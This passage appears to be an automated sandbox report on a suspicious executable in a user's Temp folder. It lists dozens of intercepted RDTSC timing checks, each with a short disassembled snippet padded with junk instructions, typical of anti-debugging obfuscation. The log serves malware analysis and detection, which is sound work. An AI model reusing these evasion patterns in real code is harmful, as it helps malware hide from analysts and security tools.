Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE5E91 second address: EE5E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE5E97 second address: EE5EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007F473118FE62h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE5EAE second address: EE5EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F47311907A6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE8B5D second address: EE8B94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F473118FE56h 0x0000000b jmp 00007F473118FE68h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F473118FE5Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE8B94 second address: EE8B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE8D20 second address: EE8D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE8D24 second address: EE8D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F47311907B0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE8D3F second address: EE8D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE8D47 second address: EE8D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47311907B9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE8EB5 second address: EE8ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F473118FE67h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEFE43 second address: EEFE64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F47311907A6h 0x0000000a jmp 00007F47311907B7h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEFE64 second address: EEFEAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F473118FE69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 js 00007F473118FE56h 0x00000016 js 00007F473118FE56h 0x0000001c pop eax 0x0000001d jmp 00007F473118FE67h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEE7F9 second address: EEE813 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F47311907A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F47311907AAh 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEE813 second address: EEE817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEE817 second address: EEE81D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEE81D second address: EEE829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEE829 second address: EEE833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEE833 second address: EEE838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEE838 second address: EEE86D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907B8h 0x00000009 jmp 00007F47311907B9h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEE86D second address: EEE873 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEECAD second address: EEECB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEEDD0 second address: EEEDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEEDD4 second address: EEEDD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9BC59 second address: E9BCD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F473118FE56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 push ecx 0x00000011 jmp 00007F473118FE67h 0x00000016 pop ecx 0x00000017 pop ebx 0x00000018 nop 0x00000019 clc 0x0000001a mov ebx, dword ptr [ebp+12481E8Ah] 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F473118FE58h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D2F41h], esi 0x00000040 mov ecx, dword ptr [ebp+122D1CD3h] 0x00000046 add eax, ebx 0x00000048 jmp 00007F473118FE69h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 pop ecx 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9BCD9 second address: E9BCE3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47311907A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEF0BB second address: EEF0C5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F473118FE56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEF0C5 second address: EEF0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F47311907AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEF0DD second address: EEF0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EEF0E3 second address: EEF0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EF933F second address: EF9345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EF9345 second address: EF934A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EF888A second address: EF88A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F473118FE64h 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EF89D5 second address: EF89D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EF89D9 second address: EF89F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F473118FE5Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EF8CA5 second address: EF8CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EF8CA9 second address: EF8CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EFEE2F second address: EFEE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47311907B6h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EFEE4B second address: EFEE4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EFF3D8 second address: EFF3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EFF3DE second address: EFF3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EFF3E2 second address: EFF40D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47311907A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F47311907AAh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47311907B5h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F004DA second address: F004E6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F473118FE5Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F00B04 second address: F00B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F06741 second address: F0674B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F473118FE56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F0674B second address: F0675E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007F47311907A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F09C52 second address: F09C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F09C5B second address: F09C65 instructions: 0x00000000 rdtsc 0x00000002 je 00007F47311907A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F09F5B second address: F09F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F09F5F second address: F09F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47311907AAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F47311907ACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F0A0F9 second address: F0A119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007F473118FE68h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F0A65C second address: F0A66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47311907A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F0A66B second address: F0A66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F0A66F second address: F0A675 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F0A675 second address: F0A67A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F10CC6 second address: F10CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47311907B7h 0x00000009 popad 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F10E43 second address: F10E72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F473118FE5Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F11433 second address: F11437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F11437 second address: F11444 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F473118FE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F116F5 second address: F116F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F116F9 second address: F1170B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F473118FE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F473118FE56h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F1170B second address: F1170F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F11B42 second address: F11B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007F473118FE56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F11B50 second address: F11B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F1221E second address: F12224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F12224 second address: F12229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F12229 second address: F1222F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F1222F second address: F12235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F12235 second address: F12279 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F473118FE56h 0x00000008 jnl 00007F473118FE56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F473118FE67h 0x0000001b jmp 00007F473118FE5Dh 0x00000020 popad 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 pop edx 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F12A08 second address: F12A25 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F47311907AAh 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F1A1EE second address: F1A1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F473118FE56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F1A1FF second address: F1A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F1A203 second address: F1A225 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F473118FE56h 0x00000008 jmp 00007F473118FE5Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jl 00007F473118FE56h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F279CA second address: F279D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F47311907A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F279D9 second address: F279DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F279DD second address: F279E7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F47311907A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F279E7 second address: F279EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F279EC second address: F279F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F27BB3 second address: F27BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F2A555 second address: F2A575 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F47311907A6h 0x00000008 jmp 00007F47311907B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F2A575 second address: F2A57F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F2A57F second address: F2A583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F2A583 second address: F2A5A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F473118FE60h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F2A5A9 second address: F2A5B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F47311907A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F2A5B4 second address: F2A5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F2A6E7 second address: F2A6EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F30FD7 second address: F30FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F473118FE5Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F3426E second address: F3427F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jnc 00007F47311907AAh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F3A764 second address: F3A777 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F3A777 second address: F3A794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F47311907B0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F3BF9E second address: F3BFA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F3EB72 second address: F3EB76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F3EB76 second address: F3EB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: F47419 second address: F4741D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
